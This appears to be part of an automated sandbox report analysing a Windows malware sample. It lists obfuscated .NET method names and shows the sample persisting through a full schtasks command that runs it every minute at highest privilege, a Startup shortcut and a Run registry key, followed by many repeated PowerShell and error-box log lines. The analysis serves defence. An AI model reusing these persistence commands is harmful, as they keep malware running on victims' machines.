Source: Or3dzp4vB1.exe, vZUlsyOu66ldYM7KSeC9Zrr9Tp.cs High entropy of concatenated method names: 'ARkgBXY9ORlKdTk02oic2KgdMk', 'tX5I6jT8h10j6FFzvkftOPr19n', '_9IWk8c9fZhgNE9q0Woxy6X9sBg', 'p5xH6MPPF4hq0UOJEUqAvzYCQg', 'ApYEo4fhfDDUuVOjd9oHh6jZDC', 'goiwqAYPCYXpDFRMlFZ1Fclz5l', 'WC4U2Cksw1oVKmKi1rMclSIqwl', '_0zoED2yorcNCSudJsBNlhRZnqE', 'qbtyA2P8qVYRLXvQEnj5iklScE', 'tSG1XKKmKmTwyZGUHXFddUEETA'
Source: 0720XW.0.dr, XKCxMrKYDPJ.cs High entropy of concatenated method names: '_4Wq7wUQrvV4', 'TM7eQerxMxo', '_1X26WUw8S0i', 'GEG8iUfaIYEAmNmcUZ5mi', 'AAoBITHtn57KIPVUxyoYS', 'fI4K21gzErYdhSpsSnPHe', 'VpBs7zSudJO6TvgyN6bHK', 'fY6SKyua5jJFnRecDAS7U', 'XhtoqOaFZKVZdXGd2ZMwn', 'MfplRFiWoOVKnpyJLzTv4'
Source: 0720XW.0.dr, aMBq7AoUdbi.cs High entropy of concatenated method names: 'YjnS6rgTn5x', 'tXs77Ner9js', 'afRdwGzyVtG', 'Uz6F61eWSVB', 'xaoaudGCeemLeY5INfFjHRcyeoA3N2rFlwWgNqSfkBBEjBIgv5bUXQonUEouU26kcS9xl6lYBqmfUe', 'hMf7Uh1WpmIzgRRR6AtkFuYUuMKLqLXmLge9nZNyCksbm98oH9ISMj1CKMFzgGbQbioYRrvTy5oiJO', 'Jy53AGECYypLOGJv4jX6LOLs49Kgn7nwGpF2Hr8QI1iuLFl8g6jFTOHalqjmcInXsB80W4uugiMOZw', '_6fODW7JyfZDcfXDQa5BMZscIkmm3yyxxWGj71CpLW2lAXmVcnh9gQwq0Ghhhne9OE8DFGyxZ3sLQh1', 'vqpy57XNyMUFktz2MCm1sN8VQSc09ehxBs9PjDj2KQFfZubbQyjSX1aOctj5nHjKAgKkdkEKO660j8', 'Nx8FtENUC0LP2Su2r4RgaAyyy1Ri25T9kXJOtHRfJVN6oeUyxP2k1BTGsLZWVtMswHLsQuEYKYysmj'
Source: 0720XW.0.dr, 7JiCBK2jKP4.cs High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'xmZjWrOtWOK', 'kGNUZ8BBRvLJxTgP39vKiskhNilLWlzFFV4cDaOVlMdzEjLSj1xRtPFQoXsp3UjU1GSW5DafaBf6mruLXWitJs2NqcaFC', 'PyRIWUeldzjtRMcB7Iundx5NRU84BxtpoWgOIbCcPiZqcY4rMKOXfb3jA7Oo3gy4yMlJ5yY7lWhIl3aRHSYedrLYUAKiC', 'S66p4NaO1QiZREbhbnfsfwsKXhVNoqEzwyP5kdZsqzKMoIRSBTf0dQd1WulIm4WVQPc28JjIJ0VDne', 'W62WXt6V3pXbZ3SXuvZbDmpNSjj6t9qUMKPpJSwJpodYrhi048NObyjA4zRrsCqUt7wof6GkVrPg9M'
Source: 0720XW.0.dr, wgogUBpxJ288HdJhyjxTGDCvz8.cs High entropy of concatenated method names: 'jVmkKMdstbzzSNoABl88HocT0p', 'qWy2E8XSCtTc1JKzdFAQi6Nl7V', 'u5YAXQo9PWkuFnzINaPfvD0aOu', 'MKqGNgN5zCpQvxCK8Et9gDk0jk', 'ihGf0hY79InhFh2aZYe5mgEgKl', 'DMusHCDdVmslT8N7yMm2gh6NQa', 'Q9MaVd5JdBQ3g1VLeR2Df2M0bc', 'DsOdJwb5RCMHFeGR6tQigW9B22', 'epN8Kkwbqy86fRKkDW7HhuLJXU', 'aMcwASUT5JHnrsz1gpYdM4FAFB'
Source: 0720XW.0.dr, DjfjT5OwA7O.cs High entropy of concatenated method names: 'rtkvH2LWxcF', 'GGZXgumyHH1', 'wtr4eJLwvNOcYeDOrUvzWjEm8ZNDoDUtfbwhy0XoYkboZzNc5PHopos74lEmNrc7QTdKuE1UAbVjp9', 'ZUILCFq1x0ixLMS0fNXQezD6EWJpT1W4T0LekNvRCbxINjreWnyBE0wefIlyNWGVGLjgyijq6tTaYP', 'uqWNCQ5vYZkoUA39WX5FyIKBCCdKdfEbc1nRtIhfcwOo8ofLU17IAa5uoBDjPcc9UTaGKj2RC5VFtt', 'lJ3sVZrjNS2CrE5FP4Iq2dgzeQNZaPpifwryCO5gEoV6ysU8YptPaR5CRoXFf30KzU2W6jsYIo8zlg'
Source: 0720XW.0.dr, UVh6gYqDsRseIc6LISxgabwfDL.cs High entropy of concatenated method names: 'DSCAbwMnxRr7s0CyzNRcAC7vVx', 'rHTu5xsEbhlnGxYGRDSEneJExz', 'jMlIBniz0G0KBYkxzwjDyjCp4a', 'iAV2B28o53XoR0fcSOnb6zZSvJ', 'oT9BRwtAwJ3PXU0msFPNwe5Sxl', 'kKtvD7IccIJRnBTz5bW8k1TZMI', 'tm0PFEVMWu8s50OXfwIOkl9DR3', 'xe2Bvj4V4xB', 'OxNJzl1jVor', 'wNuTMZjjDyX'
Source: 0720XW.0.dr, v1WK3HQ1SJk.cs High entropy of concatenated method names: 'YlmC3pb68NB', 'buL8kR0oIiB', 'x1xfZCV3rwQ', 'whb3Qh9SjIG', 'SAZnAqHpmwQ', 'ekkMuNK2jcz', 'ZSNDpc7VeAu', 'DmXrmqJaYdc', 'qkGejArAPUg', 'dk1qwuWDkc0'
Source: 0720XW.0.dr, 2PiJ0XhLI0Qp8KhHBi10nRhXgt.cs High entropy of concatenated method names: '_1IbDOXDulvGK89BzdxkPXa2b0Z', 'VyUpp9scFeA', 'kHkif2Mmrxy', 'DcdysQvsw9u', 'RgVqbUuRszX', 'r5XztVKM2ed', 'tEfshgdcdk3', 'hBxFFg2eETE', 'iVUy0gaRpYh', 'ATwj6CdWP5c'
Source: 0720XW.0.dr, jGEa6BYs0PLz0bPSuuML3cXJ6C.cs High entropy of concatenated method names: 'MSA8IbsX3mwvSFphnHRsQVgEgY', 'CpUujZSdP2JvfAZKAufC2Zqcp1zi7hYKChPMyLHwk8YReX87YEmkcRiohgABDDoiNKE1m5bpKVSY', 'mqDkrHTPT1hbkm7Z8dcRpqDFC8BYP87YyvRWjl2LlnzpoFr32TTxyveUtk1MzL2SFmLJbl2zEdBe', 'H841selCro0xvgoYufMdmXBw5RvzW3PzCLK8hEPMEAA3MJFZ8fNQmCy7dr0MVOJ6a8ID4j9hd31H', 'FXvaLdv3oSxguFTmFIZ4NghnwsST1w92btk6L4hrR5BtpkDyyG0Od5rERwFbI5nVz2x7O21AMrKe'
Source: 0720XW.0.dr, 6tNVwwp2mfC.cs High entropy of concatenated method names: 'vM6XSdz8mMu', 'mttYXo6jbFUJPCV3yvi5TS8tXWag4jzmkSn5tfvGEUjLj2KEfw6KZlGuTNAnb51sJADcbAW6FgTBmW', 'WoQQkJeVqYg5HVtavuA7NHaxDsykT9EbRBwSxHscKc58JFXEkEonZtPS1m3Nq7tirj4wYloRY505bw', 'i4ER7tGwmD7eFKamNt9schZEf2fOLJQFxIliGZoMBl0hafrHJrm7KpNZNLzFZT4CpjDaH90rdCylVX', '_8RvOPLbVCCBRGuLKoi2rHzJ5mYLtZB3P2ahq7moSlbLGDDPF2aaIrWoO6wsWAkdHvooNwc1NBEniNi'
Source: 0720XW.0.dr, G4bL9AcMy6N.cs High entropy of concatenated method names: 'RegexResult', 'WndProc', 'WSNdFLy8Hc7sJaqGIGfzBTJDBppT9CvgmiSEssA8y3BGqHQWhfK7GPzenh0CBXcGgmTqbNblwB3djL', 'X5oed2KF6qlXYfbjpF1JL7cVTqU0XRnHkcXXd0cKGXJUdHkGLZGbaek7GXJMfOvCBLp2wGrs2ICbK3'
Source: 0720XW.0.dr, T8OeMrVcLjImLRIolSzxRmx4be.cs High entropy of concatenated method names: 'ykZWS7LvuIYNONbiVEsNDfx2ry', 'bfmqyChL0E0rDbp7Z846RlVLrR', '_8YERJqyml6SCjt9B4dJ77CwH7S', 'R3V6Omm38oSRQxtqYOy5LDxrc7ZhAQ7hToOUW7zZpWRwdZUaAbGLSK9kumDjNggYsa0UyFIlTz9U', 'UkelaLSCF7wYsHif0kvqIBlCUOIA9npm8B0QpgEG0YIRLGNCDj5ZO8eLmtgxi12kFEMDTKuaLpPu', 'gfUdpKZ4gHwp2qWCcsJNYfvTo0f9stxLDFdxOeHW4v16biAiWSNcm1xgMzjspYEObdluPrgA6DYX', '_4KOrpYbZEFqVSRQKxTQCZ3CdTbiwkNBCp9QP1XNaWKFCHf6MGiWlxEHPhfpaPYTYYF0exx92F2sv', '_4ByAM2p7sPUvpjYXfPaY5CofhI3rwS4CtkkcFNe4dfXHUkqQHSjGoAF6rWf0gnKvddnVJDlkKOm6', 'kkSh58Hm9xu0g8COzdRu2tCxy2AUbV2gUVnYtaVozJsddia8UxVDN07zVlDWLOSQlvl1gv16oBuZ', 'OtxiTMEdP1SYC6JFCaeeqzC1iYgsbfPyZynuPKU7CUTpZPpZ0Cnlh9VFGcYnzM4M5Lx15NOq9GDv'
Source: 0720XW.0.dr, vZUlsyOu66ldYM7KSeC9Zrr9Tp.cs High entropy of concatenated method names: 'ARkgBXY9ORlKdTk02oic2KgdMk', 'tX5I6jT8h10j6FFzvkftOPr19n', '_9IWk8c9fZhgNE9q0Woxy6X9sBg', 'p5xH6MPPF4hq0UOJEUqAvzYCQg', 'ApYEo4fhfDDUuVOjd9oHh6jZDC', 'goiwqAYPCYXpDFRMlFZ1Fclz5l', 'WC4U2Cksw1oVKmKi1rMclSIqwl', '_0zoED2yorcNCSudJsBNlhRZnqE', 'qbtyA2P8qVYRLXvQEnj5iklScE', 'tSG1XKKmKmTwyZGUHXFddUEETA'
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File created: C:\Users\user\AppData\Roaming\0720XW Jump to dropped file
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File created: C:\Users\user\AppData\Roaming\0720XW Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "0720XW" /tr "C:\Users\user\AppData\Roaming\0720XW"
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0720XW.lnk Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0720XW.lnk Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0720XW Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 0720XW Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Or3dzp4vB1.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
